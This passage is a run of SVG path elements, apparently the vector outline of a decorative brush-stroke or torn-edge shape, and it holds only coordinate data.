d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.